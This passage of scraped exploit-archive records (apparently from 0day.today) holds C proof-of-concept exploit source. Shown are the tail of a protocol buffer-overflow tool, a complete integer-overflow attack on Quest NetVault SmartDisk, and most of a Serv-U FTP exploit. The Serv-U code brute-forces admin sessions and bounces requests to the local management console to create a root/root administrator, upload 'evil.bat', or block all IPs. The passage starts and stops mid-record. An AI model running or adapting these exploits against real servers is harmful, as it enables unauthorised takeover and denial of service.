2) < 0) return(-1);\r\n if(type == 0x683c) { // \"<html>\", yeah it's lame but this is only a PoC\r\n if(tcp_recv(sd, NULL, BUFFSZ) < 0) return(-1);\r\n break;\r\n }\r\n\r\n if(tcp_recv(sd, (void *)&len, 4) < 0) return(-1);\r\n buff = realloc(buff, len); // no !buff check, will be automatically skipped\r\n if(tcp_recv(sd, buff, len) < 0) return(-1);\r\n if(buff) printf(\" %-26s \", buff);\r\n if(!buff || !strcmp(buff, \"NM_A_SZ_TRANSACTION_ID\")) eof = 1;\r\n\r\n if(tcp_recv(sd, (void *)&len, 4) < 0) return(-1);\r\n if((type == 10) || (type == 13)) {\r\n buff = realloc(buff, len); // no !buff check, will be automatically skipped\r\n if(tcp_recv(sd, buff, len) < 0) return(-1);\r\n if(buff) printf(\"%s\\n\", buff);\r\n } else {\r\n printf(\"%d\\n\", len);\r\n }\r\n } while(!eof);\r\n printf(\"\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gwm(int sd, u8 *cmd, ...) {\r\n static u8 buff[BUFFSZ + 1],\r\n tmp[MAXSZ + 1];\r\n static int tid = 0;\r\n va_list ap;\r\n int type,\r\n len;\r\n u8 *p,\r\n *s1,\r\n *s3;\r\n\r\n p = buff;\r\n p += sprintf(p,\r\n \"POST /%s HTTP/1.0\\r\\n\"\r\n \"\\r\\n\",\r\n cmd);\r\n\r\n va_start(ap, cmd);\r\n for(;;) {\r\n s1 = va_arg(ap, u8 *);\r\n if(!s1) break;\r\n type = va_arg(ap, int);\r\n if((type == 10) || (type == 13)) {\r\n s3 = va_arg(ap, u8 *);\r\n if(!s3) { // max string\r\n memset(tmp, BOFCHR & 0xff, MAXSZ);\r\n tmp[MAXSZ] = 0;\r\n s3 = tmp;\r\n } else if((u32)(s3) <= 0x1000) {\r\n sprintf(tmp, \"%d\", (u32)s3);\r\n s3 = tmp;\r\n }\r\n } else {\r\n sprintf(tmp, \"%d\", va_arg(ap, int));\r\n s3 = tmp;\r\n }\r\n p += sprintf(p,\r\n \"&tag=%s\"\r\n \"&cmd=0\"\r\n \"&val=%s\"\r\n \"&type=%d\",\r\n s1, s3, type);\r\n }\r\n va_end(ap);\r\n\r\n p += sprintf(p,\r\n \"&tag=%s\"\r\n \"&cmd=0\"\r\n \"&val=%d\"\r\n \"&type=%d\"\r\n \"\\n\",\r\n \"NM_A_SZ_TRANSACTION_ID\", ++tid, 10);\r\n\r\n len = p - buff;\r\n if(len > BUFFSZ) {\r\n printf(\"\\nError: too much data (%d) for the send buffer (%d)\\n\", len, BUFFSZ);\r\n exit(1);\r\n }\r\n\r\n //printf(\">SEND\\n%s\\n\", buff);\r\n if(send(sd, buff, len, 0) < 0) return(-1);\r\n\r\n if(recv_gwm(sd) < 0) return(-1);\r\n\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18885"}, {"lastseen": "2018-03-20T01:22:52", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "Quest NetVault SmartDisk <= 1.2.1 integer overflow", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T01:22:52", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18888", "href": "https://0day.today/exploit/description/18888", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n--------------\r\npercolator_1.c\r\n--------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 37452\r\n#define BUFFSZ 0x100000\r\n#define BUG 0x10000000\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n t,\r\n len;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Quest NetVault SmartDisk <= 1.2.1 integer overflow \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <host> [port(%d)]\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n host = argv[1];\r\n if(argc > 2) port = atoi(argv[2]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n\r\n len = 3 + (BUG * 2) + 2 + 1; // should be ok\r\n\r\n printf(\"- send header\\n\");\r\n p = buff;\r\n p += putxx(p, 4 + 4+1+4+4 + len+0x400, 32); // packet size (included itself)\r\n p += putxx(p, 4+1+4+4 + len+0x400, 32); // message size\r\n p += putxx(p, 0x01, 8); // opcode\r\n p += putxx(p, 0xc8000000, 32); // sub-opcode or similar\r\n p += putxx(p, len, 32); // size of the entries\r\n p += putss(p, \"ox;\");\r\n send(sd, buff, p - buff, 0);\r\n\r\n printf(\"- send 0x%08x entries, wait some seconds:\\n\", BUG);\r\n\r\n /* normal slow solution\r\n for(i = 0; i < BUG; i++) { // integer overflow\r\n if(!(i & 0xffff)) printf(\" %08x\\r\", i);\r\n send(sd, \"S;\", 2, 0);\r\n }\r\n */\r\n\r\n // fast solution\r\n t = BUFFSZ / 2;\r\n p = buff;\r\n for(i = 0; i < t; i++) {\r\n p += putmm(p, \"i;\", 2);\r\n }\r\n len = p - buff;\r\n for(i = 0; (i + t) <= BUG; i += t) {\r\n printf(\" %08x\\r\", i);\r\n send(sd, buff, len, 0);\r\n }\r\n for(; i < BUG; i++) {\r\n send(sd, buff, 2, 0);\r\n }\r\n send(sd, \"i;\", 3, 0); // ebp - 1\r\n printf(\" %08x\\n\", i + 1);\r\n\r\n // the following data is useless at the moment because not read\r\n for(i = 0; i < 0x100; i++) {\r\n send(sd, \"AAAA\", 4, 0);\r\n }\r\n\r\n if(!timeout(sd, 3)) {\r\n len = recv(sd, buff, BUFFSZ, 0);\r\n }\r\n close(sd);\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n p = data;\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18888"}, {"lastseen": "2018-01-03T09:02:01", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "Serv-U FTP <= 11.1.0.3 possible management console access", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-03T09:02:01", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18886", "href": "https://0day.today/exploit/description/18886", "sourceData": "--------\r\n\r\nwinerr.h\r\n\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n----------\r\nservu_1b.c\r\n----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <ctype.h>\r\n#include <time.h>\r\n#include <inttypes.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n #define strnicmp strncasecmp\r\n #define strnistr strncasestr\r\n#endif\r\n\r\n#ifdef WIN32\r\n #define quick_thread(NAME, ARG) DWORD WINAPI NAME(ARG)\r\n #define thread_id HANDLE\r\n#else\r\n #define quick_thread(NAME, ARG) void *NAME(ARG)\r\n #define thread_id pthread_t\r\n#endif\r\n\r\nthread_id quick_threadx(void *func, void *data) {\r\n thread_id tid;\r\n#ifdef WIN32\r\n DWORD tmp;\r\n\r\n tid = CreateThread(NULL, 0, func, data, 0, &tmp);\r\n if(!tid) return(0);\r\n#else\r\n if(pthread_create(&tid, NULL, func, data)) return(0);\r\n#endif\r\n return(tid);\r\n}\r\n\r\nvoid quick_threadz(thread_id tid) {\r\n#ifdef WIN32\r\n DWORD ret;\r\n\r\n for(;;) {\r\n if(!GetExitCodeThread(tid, &ret)) break;\r\n if(!ret) break;\r\n Sleep(100);\r\n }\r\n#else\r\n pthread_join(tid, NULL);\r\n#endif\r\n}\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 21\r\n#define BUFFSZ 4096\r\n#define ADMIN_PORT 43958\r\n\r\n\r\n\r\ntypedef struct {\r\n struct sockaddr_in peer;\r\n int sd;\r\n int n;\r\n long long start;\r\n long long session;\r\n long long end;\r\n thread_id tid;\r\n int done;\r\n} args_t;\r\n\r\n\r\n\r\nquick_thread(servu_scan, args_t *args);\r\nint delimit(u8 *data);\r\nint conna(struct sockaddr_in *peer);\r\nint get_ftp_port(u8 *buff, u32 *ip);\r\nint recv_ftp(int sd, u8 **rbuff);\r\nint send_ftp(int sd, u8 *cmd, u8 *arg);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nstatic int debug = 0,\r\n exploit = 4;\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n long long session;\r\n args_t *args;\r\n int sd,\r\n i,\r\n n,\r\n res = -1;\r\n u16 port = PORT;\r\n u8 *host,\r\n *user,\r\n *pass,\r\n *sess,\r\n *p,\r\n *l;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n fputs(\"\\n\"\r\n \"Serv-U FTP <= 11.1.0.3 possible management console access \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 5) {\r\n printf(\"\\n\"\r\n \"Usage: %s [-d/e] <session_start> <username> <password> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"- this proof-of-concept demonstrates the vulnerability by creating the user\\n\"\r\n \" root with password root having full access and privileges, watch the source\\n\"\r\n \" code and choose the other examples using the -e option\\n\"\r\n \"- your user MUST have write privileges to exploit the vulnerability\\n\"\r\n \"- session_start is the value from which starting the scanning, for example\\n\"\r\n \" 9000 if both the server and the management console have been just started,\\n\"\r\n \" you can also specify multiple starts like 8000,9000,10000,11000 and the\\n\"\r\n \" tool will scan them in multi-threading increasing the speed\\n\"\r\n \"- successfully tested with Windows XP and 2003 Server\\n\"\r\n \"- it's not clear if Windows 7/2008 is vulnerable, Linux not tested\\n\"\r\n \"\\n\"\r\n \"Example: servu_1b 9000,12000,14000 myuser mypass example.com\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n // just for my tests\r\n for(i = 1; i < argc; i++) {\r\n if(argv[i][0] != '-') break;\r\n if(!strcmp(argv[i], \"-d\")) {\r\n debug = 1;\r\n } else if(!strcmp(argv[i], \"-e\")) {\r\n i++;\r\n exploit = atoi(argv[i]);\r\n }\r\n }\r\n\r\n sess = argv[i];\r\n user = argv[i + 1];\r\n pass = argv[i + 2];\r\n host = argv[i + 3];\r\n if((i + 4) < argc) port = atoi(argv[i + 4]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n printf(\r\n \"- create a file containing the commands to send to the server\\n\"\r\n \"- it must have the correct Session number so let's go with the scan\\n\");\r\n\r\n n = 0;\r\n for(i = 0; sess[i]; i++) {\r\n if(sess[i] == ',') n++;\r\n }\r\n n++;\r\n args = calloc(sizeof(args_t), n + 1);\r\n if(!args) std_err();\r\n\r\n p = sess;\r\n for(i = 0; *p; i++) {\r\n l = strchr(p, ',');\r\n if(l) *l = 0;\r\n session = atol(p);\r\n\r\n sd = conna(&peer);\r\n\r\n if(recv_ftp(sd, &p) < 0) goto quit;\r\n\r\n if(send_ftp(sd, \"USER\", user) < 0) goto quit;\r\n if(recv_ftp(sd, &p) < 0) goto quit;\r\n\r\n if(send_ftp(sd, \"PASS\", pass) < 0) goto quit;\r\n if(recv_ftp(sd, &p) < 0) goto quit;\r\n\r\n memcpy(&args[i].peer, &peer, sizeof(struct sockaddr_in));\r\n args[i].sd = sd;\r\n args[i].n = i;\r\n args[i].start = session;\r\n args[i].end = -1;\r\n args[i].tid = quick_threadx(servu_scan, &args[i]);\r\n\r\n if(!l) break;\r\n p = l + 1;\r\n }\r\n\r\n for(i = 0; args[i].tid; i++) {\r\n if(i) args[i - 1].end = args[i].start;\r\n }\r\n\r\n printf(\"\\n- Current Session:\\n\");\r\n\r\n for(;;) {\r\n n = 0;\r\n for(i = 0; args[i].tid; i++) {\r\n if(args[i].done) n++;\r\n }\r\n if(n >= i) break;\r\n\r\n printf(\"\\r\");\r\n for(i = 0; args[i].tid; i++) {\r\n printf(\" %-14\"PRIu64\"\", args[i].session);\r\n if(debug) printf(\"\\n\");\r\n }\r\n sleep(ONESEC);\r\n }\r\n //for(i = 0; args[i].tid; i++) {\r\n //quick_threadz(args[i].tid);\r\n //}\r\n\r\n res = 0;\r\n\r\nquit:\r\n //close(sd);\r\n if(res < 0) {\r\n printf(\"\\nError: something wrong in the protocol or the connection\\n\");\r\n } else {\r\n printf(\"\\n- done\\n\");\r\n }\r\n return(0);\r\n}\r\n\r\n\r\n\r\nquick_thread(servu_scan, args_t *args) {\r\n struct sockaddr_in peer;\r\n long long session;\r\n int sd,\r\n s,\r\n len,\r\n hlen,\r\n ret,\r\n delperm = 1,\r\n res = -1;\r\n u8 fname[64],\r\n http[1024],\r\n *buff,\r\n *p;\r\n\r\n sd = args->sd;\r\n\r\n buff = malloc(BUFFSZ + 1);\r\n if(!buff) std_err();\r\n\r\n if(send_ftp(sd, \"TYPE\", \"I\") < 0) goto quit;\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) goto quit;\r\n\r\n for(session = args->start;; session++) {\r\n if((args->end > 0) && (session >= args->end)) break;\r\n if(debug) printf(\"\\n%\"PRIu64\"\\n\\n\", session);\r\n\r\n args->session = session;\r\n //printf(\"\\n- check Session %\"PRIu64\"\\n\\n\", session);\r\n sprintf(fname, \"bug%u.txt\", (int)(time(NULL) + session));\r\n\r\n if(send_ftp(sd, \"PASV\", \"\") < 0) goto quit;\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) goto quit;\r\n\r\n memcpy(&peer, &args->peer, sizeof(struct sockaddr_in));\r\n peer.sin_port = htons(get_ftp_port(p, NULL));\r\n\r\n if(send_ftp(sd, \"STOR\", fname) < 0) goto quit;\r\n // receives the 1xx response for the ok\r\n\r\n /*\r\n UPLOAD HTTP REQUEST\r\n */\r\n\r\n hlen = 0;\r\n len = 0;\r\n if(exploit == 1) {\r\n // 1: deny *.*.*.*\r\n len = sprintf(buff,\r\n \"IP=*.*.*.*&Allow=0\");\r\n\r\n } else if(exploit == 2) {\r\n // 2: upload an evil file: c:\\evil.bat\r\n len = sprintf(buff,\r\n \"-----------------------------1234567890\\r\\n\"\r\n \"Content-Disposition: form-data; name='File'; filename='evil.bat'\\r\\n\" // filename is ignored\r\n \"Content-Type: application/octet-stream\\r\\n\"\r\n \"\\r\\n\"\r\n \"notepad.exe\\r\\n\"\r\n \"-----------------------------1234567890--\\r\\n\");\r\n\r\n } else if(exploit == 3) {\r\n // 3: move a file from a location to another: c:\\old.txt -> c:\\evil.bat\r\n // fast but you need to know the full real path of your folder\r\n len = sprintf(buff,\r\n \"new_path=/C:/evil.bat&original_path=/C:/old.txt\");\r\n\r\n } else if(exploit == 4) {\r\n // 4: root user\r\n len = sprintf(buff, // Access=7967\r\n \"LoginID=root&Password=root&HomeDir=/&LockInHomeDir=0&Access=8191&EmailAddress=&FullName=&RequirePasswordChange=0&AlwaysAllowLogin=1&ComboAdminType=System%%20Administrator&AdminType=2&\");\r\n\r\n } else {\r\n printf(\"\\nError: invalid test number (%d)\\n\", exploit);\r\n exit(1);\r\n }\r\n\r\n if(exploit == 1) {\r\n hlen = sprintf(http,\r\n \"POST /Admin/XML/Result.xml?Session=%\"PRIu64\"&Command=AddObject&Object=CServer.0.IPAccess HTTP/1.1\\r\\n\",\r\n session);\r\n\r\n } else if(exploit == 2) {\r\n hlen = sprintf(http,\r\n \"POST /?Session=%\"PRIu64\"&Command=Upload&Dir=/C:/&TransferID=2&File=evil.bat HTTP/1.1\\r\\n\"\r\n \"Content-Type: multipart/form-data; boundary=---------------------------1234567890\\r\\n\",\r\n session);\r\n\r\n } else if(exploit == 3) {\r\n hlen = sprintf(http,\r\n \"POST /?Session=%\"PRIu64\"&Command=Rename&Dir=/C: HTTP/1.1\\r\\n\",\r\n session);\r\n\r\n } else if(exploit == 4) {\r\n hlen = sprintf(http,\r\n \"POST /Admin/XML/Result.xml?Session=%\"PRIu64\"&Command=ObjectCommand&Object=COrganization.241.CreateUser HTTP/1.1\\r\\n\",\r\n session);\r\n }\r\n hlen += sprintf(http + hlen,\r\n //\"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\"\r\n \"Host: 127.0.0.1:43958\\r\\n\"\r\n \"Content-Length: %d\\r\\n\"\r\n \"\\r\\n\",\r\n len);\r\n\r\n s = conna(&peer);\r\n send(s, http, hlen, 0);\r\n send(s, buff, len, 0);\r\n close(s);\r\n\r\n for(;;) {\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) == 1) continue;\r\n if((ret / 100) != 2) goto quit;\r\n break;\r\n }\r\n\r\n sprintf(buff,\r\n \"%d,%d,%d,%d,%d,%d\",\r\n 127, 0, 0, 1,\r\n (ADMIN_PORT >> 8) & 0xff, ADMIN_PORT & 0xff);\r\n if(send_ftp(sd, \"PORT\", buff) < 0) goto quit;\r\n\r\n //sprintf(buff, \"|2|::1|%d|\", ADMIN_PORT);\r\n //if(send_ftp(sd, \"EPRT\", ) < 0) goto quit;\r\n\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) != 2) goto quit;\r\n\r\n if(send_ftp(sd, \"RETR\", fname) < 0) goto quit;\r\n for(;;) {\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto quit;\r\n if((ret / 100) == 1) continue;\r\n if(ret == 425) {\r\n printf(\"\\n\"\r\n \"Error: seems that the server isn't vulnerable:\\n\"\r\n \" %s\\n\"\r\n \"\\n\",\r\n p);\r\n goto quit;\r\n }\r\n //if((ret / 100) != 2) goto quit;\r\n // ignore errors and continue\r\n break;\r\n }\r\n\r\n if(delperm) {\r\n if(send_ftp(sd, \"DELE\", fname) < 0) goto quit;\r\n ret = recv_ftp(sd, &p);\r\n if(ret < 0) goto 